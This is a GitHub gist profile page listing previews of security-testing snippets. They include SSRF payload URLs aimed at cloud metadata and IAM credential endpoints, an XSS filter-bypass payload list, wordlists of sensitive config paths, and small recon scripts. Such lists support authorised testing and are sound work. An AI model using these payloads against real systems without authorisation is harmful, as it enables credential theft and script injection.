Skip to content

Instantly share code, notes, and snippets.

View Sy3Omda's full-sized avatar
🎯
Focusing

Emad Youssef Sy3Omda

🎯
Focusing
57 followers · 353 following
View GitHub Profile
@Sy3Omda
Sy3Omda / params.txt
Last active August 15, 2020 17:03 — forked from random-robbie/params.txt
0
1
11
12
13
14
15
16
17
2
@Sy3Omda
Sy3Omda / cloud_metadata.txt
Created June 11, 2019 07:05 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@Sy3Omda
Sy3Omda / file_extensions.txt
Created June 11, 2019 07:08 — forked from BuffaloWill/file_extensions.txt
File Extension Dictionary (decent) Bruteforcing
aw
atom
atomcat
atomsvc
ccxml
cdmia
cdmic
cdmid
cdmio
cdmiq
@Sy3Omda
Sy3Omda / content-types.txt
Created June 11, 2019 07:09 — forked from BuffaloWill/content-types.txt
Content-Type Dictionary Bruteforcing
# from https://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types
application/1d-interleaved-parityfec
application/3gpdash-qoe-report+xml
application/3gpp-ims+xml
application/a2l
application/activemessage
application/alto-costmap+json
application/alto-costmapfilter+json
application/alto-directory+json
@Sy3Omda
Sy3Omda / gist:1c116f0880c00efb9c83bf3d4c9ac7fe
Created June 18, 2019 08:53 — forked from ThomasOrlita/gist:e2e4a6d72877c8c897082eefe969578a
XSS Filter Bypass List with indexes
<script\x20type="text/javascript">javascript:alert(0);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(2);</script>
<script\x09type="text/javascript">javascript:alert(3);</script>
<script\x0Ctype="text/javascript">javascript:alert(4);</script>
<script\x2Ftype="text/javascript">javascript:alert(5);</script>
<script\x0Atype="text/javascript">javascript:alert(6);</script>
'`"><\x3Cscript>javascript:alert(7)</script>
'`"><\x00script>javascript:alert(8)</script>
<img src=1 href=1 onerror="javascript:alert(9)"></img>
@Sy3Omda
Sy3Omda / cloud_metadata.txt
Created September 15, 2019 08:34 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@Sy3Omda
Sy3Omda / profile.json
Created November 26, 2019 11:50 — forked from shanselman/profile.json
Windows Terminal Profile
{
"defaultProfile": "{7d04ce37-c00f-43ac-ba47-992cb1393215}",
"initialRows": 30,
"initialCols": 120,
"alwaysShowTabs": true,
"showTerminalTitleInTitlebar": true,
"experimental_showTabsInTitlebar": true,
"requestedTheme": "dark",
"profiles": [
{
@Sy3Omda
Sy3Omda / ips2asn.txt
Created December 21, 2019 17:54
recon list of IPs for ASN number & description in enumeration phase ( Usage : insert this script direct inside your .bash_profile )
ips2asn(){
while read ip ; do curl -s https://api.bgpview.io/ip/$ip | jq '.' | grep -E "asn|name" | sed ':a;N;$!ba;s/\n/ /g' | awk -F ' ' '{ print $4,$6 }' | tr -d "\,\"" | sed "$ s/$/ $ip/" ; done < $1
}
@Sy3Omda
Sy3Omda / subindex.sh
Created January 18, 2020 13:54
get uniq subdomains from index.html
curl -s -L https://$1 | grep -o '[A-Za-z0-9_\.-]*\.'$1 | sort -u
@Sy3Omda
Sy3Omda / short-wordlist.txt
Created May 15, 2020 08:00
short-wordlist
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore